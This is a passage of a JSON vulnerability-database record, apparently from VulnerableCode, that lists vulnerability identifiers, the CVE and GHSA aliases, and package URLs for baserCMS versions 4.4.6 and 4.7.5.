                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zxns-tzw3-27fr"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5"
                }
            ],
            "aliases": [
                "CVE-2023-25655",
                "GHSA-mfvg-qwcw-qvc8"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6"
        }
    ],
    "fixing_vulnerabilities": [],
    "risk_score": null,
    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.6"
}